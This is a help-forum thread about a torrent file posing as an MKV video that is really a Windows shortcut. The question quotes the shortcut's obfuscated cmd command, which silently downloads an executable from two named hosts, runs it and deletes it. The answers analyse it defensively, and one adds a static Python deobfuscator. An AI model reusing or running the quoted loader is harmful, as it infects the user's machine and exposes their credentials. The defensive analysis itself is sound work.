-1

I downloaded a torrent that appears to be an MKV file, but when I open the priorities, it shows a shortcut. Under the target, it shows the following command:

%comspec% /v:on/c(set wwe42=%username%.exe&set tnsv=/?931dd7ca2b62dce1=%processor_architecture%&if not exist !wwe42! (set fqdce=powershell -w 1 -c iwr -outf !wwe42! https://&!fqdce!frew.line.pm!tnsv!||!fqdce!j.krq.ch!tnsv!&!wwe42!&del/q !wwe42!))>nul 2>&1

What is it intended to do? Should I be concerned?

Destroy666
  • 12,350
DSol
  • 11

2 Answers

4

So, you downloaded a file that was supposed to be an MKV file (a video format, known as Matroska Video), but it turned out to be a shortcut. When something like this happens, it is likely that you downloaded malware instead. It is recommended to just delete it.

Now, to explain what the code does:

%comspec% /v:on /c (set wwe42=%username%.exe & set tnsv=/?931dd7ca2b62dce1=%processor_architecture% & if not exist !wwe42! (set fqdce=powershell -w 1 -c iwr -outf !wwe42! https:// & !fqdce!frew.line.pm!tnsv!||!fqdce!j.krq.ch!tnsv! & !wwe42! & del /q !wwe42!))>nul 2>&1

It is invoking %comspec% with some obfuscated & minified batch script to execute. %comspec% is just an environment variable to %windir%\system32\cmd.exe (Command Prompt).

So, we know that it is just going to run a batch file (and suppress command-line output):

set wwe42=%username%.exe
set tnsv=/?931dd7ca2b62dce1=%processor_architecture%
if not exist !wwe42! (
    set fqdce=powershell -w 1 -c iwr -outf !wwe42! https://
    !fqdce!frew.line.pm!tnsv! || !fqdce!j.krq.ch!tnsv!
    !wwe42!
    del /q !wwe42!
)

So, it downloads an exe file from frew.line.pm/?931dd7ca2b62dce1=%processor_architecture% or j.krq.ch/?931dd7ca2b62dce1=%processor_architecture% (I do not recommend visiting these URLs) and saves it as %username%.exe. It then runs this exe and deletes it.

And yes, it is "dangerous". Just delete it. If you ran the shortcut - you need to scan your system using an installed Anti-Virus software (Windows Defender by default), and it is also recommended to change passwords on most accounts if you ran the shortcut - this program can do anything, including stealing credentials.
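The expansion the answer above walks through by hand can be done statically, without ever running the command. The following Python script is an added example (not from either answer and not a tool the page refers to): it simulates cmd's immediate `%var%` and delayed `!var!` expansion on the text of the shortcut target, then reports the download URLs, the dropped file name, and whether the dropped file is executed, deleted, and run silently. The `SAMPLE` string is a copy of the command quoted in the question, the function and class names (`analyze`, `Summary`, `collect_sets`) are my own, and keeping unresolved `!name!` tokens verbatim is an analysis choice rather than cmd's behaviour. The optional `env` argument lets you plug in sample values for `%username%` and `%processor_architecture%` to see the fully resolved URLs.

```python
"""Static deobfuscation of a cmd.exe /v:on one-liner like the shortcut target
quoted in the question. Nothing is executed: the code only simulates cmd's
%var% and !var% expansion on the text, then reports what the expanded
command would do. Hypothetical helper written for this page, not a tool
from the page itself."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed copy of the shortcut target from the question (text only, never run).
SAMPLE = (
    "%comspec% /v:on/c(set wwe42=%username%.exe&set tnsv=/?931dd7ca2b62dce1="
    "%processor_architecture%&if not exist !wwe42! (set fqdce=powershell -w 1 "
    "-c iwr -outf !wwe42! https://&!fqdce!frew.line.pm!tnsv!||!fqdce!j.krq.ch"
    "!tnsv!&!wwe42!&del/q !wwe42!))>nul 2>&1"
)

SET_RE = re.compile(r"\bset\s+(\w+)=([^&|)]*)")  # a value ends at a command separator
IMMEDIATE_RE = re.compile(r"%(\w+)%")            # %var%: expanded once, at parse time
DELAYED_RE = re.compile(r"!(\w+)!")              # !var!: expanded as each command runs (/v:on)
URL_RE = re.compile(r"https?://[^\s&|()]+")
OUTF_RE = re.compile(r"-outf\s+(\S+)")


def expand_immediate(text: str, env: dict[str, str]) -> str:
    """Substitute %NAME% from a caller-supplied environment; unknown names stay verbatim."""
    return IMMEDIATE_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def expand_delayed(text: str, variables: dict[str, str]) -> str:
    """Substitute !NAME! from variables set earlier in the block. Unresolved names
    are kept verbatim so the analyst can still see them (an analysis choice)."""
    return DELAYED_RE.sub(lambda m: variables.get(m.group(1), m.group(0)), text)


def collect_sets(cmd: str) -> dict[str, str]:
    """Walk the `set NAME=VALUE` statements in order. Each VALUE is delayed-expanded
    against the variables defined before it, which is why fqdce ends up holding the
    already-resolved output file name."""
    variables: dict[str, str] = {}
    for name, value in SET_RE.findall(cmd):
        variables[name] = expand_delayed(value, variables)
    return variables


@dataclass
class Summary:
    variables: dict[str, str]
    expanded: str
    urls: list[str]
    dropped_file: Optional[str]
    executes_dropped_file: bool
    deletes_dropped_file: bool
    output_suppressed: bool
    hidden_powershell: bool


def analyze(cmd: str, env: Optional[dict[str, str]] = None) -> Summary:
    """Expand the one-liner and pull out the indicators an analyst wants."""
    cmd = expand_immediate(cmd, {k.lower(): v for k, v in (env or {}).items()})
    variables = collect_sets(cmd)
    expanded = expand_delayed(cmd, variables)

    urls = list(dict.fromkeys(URL_RE.findall(expanded)))  # de-duplicate, keep order
    outf = OUTF_RE.search(expanded)
    dropped = outf.group(1) if outf else None

    # Split on the & and || separators to see which individual commands run.
    commands = [c.strip(" ()") for c in re.split(r"\|\||&", expanded)]
    executes = dropped is not None and dropped in commands
    deletes = dropped is not None and any(
        re.match(r"del\b", c) and dropped in c for c in commands
    )
    return Summary(
        variables=variables,
        expanded=expanded,
        urls=urls,
        dropped_file=dropped,
        executes_dropped_file=executes,
        deletes_dropped_file=deletes,
        output_suppressed=bool(re.search(r">\s*nul\s+2>&1", cmd)),
        # powershell -w 1 is -WindowStyle Hidden
        hidden_powershell=bool(re.search(r"powershell\b.*?\s-w\s*1\b", expanded)),
    )


if __name__ == "__main__":
    s = analyze(SAMPLE)
    print("expanded:", s.expanded)
    for u in s.urls:
        print("download:", u)
    print("drops", s.dropped_file, "| runs it:", s.executes_dropped_file,
          "| deletes it:", s.deletes_dropped_file,
          "| silent:", s.output_suppressed and s.hidden_powershell)
```

Running it on the sample prints the two `https://frew.line.pm/?931dd7ca2b62dce1=…` and `https://j.krq.ch/?931dd7ca2b62dce1=…` URLs with `%processor_architecture%` left in place, `%username%.exe` as the dropped file, and all four behaviour flags true; passing `env={"username": "alice", "processor_architecture": "AMD64"}` shows the concrete file name and URLs a given machine would produce. The point of the split between `expand_immediate` and `expand_delayed` is the same one the answer relies on: `%username%` is resolved when cmd parses the line, while the `!wwe42!` references are resolved only when each command in the parenthesised block actually runs.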

1

It attempts to quietly:

  • send a GET web request with iwr a.k.a. Invoke-WebRequest to some random, obviously suspicious websites, with info about your processor architecture in a parameter
  • store the result in a file named [your_username].exe
  • execute that file
  • delete it with del = permanently

Both domains that are used are online, although I don't see any downloads or responses with harmful content occurring at those specific addresses at this moment.

If you ran it and it was successful, you might be in trouble. In that case, definitely fully scan your system with Microsoft Defender at the very least. See also this.

Destroy666
  • 12,350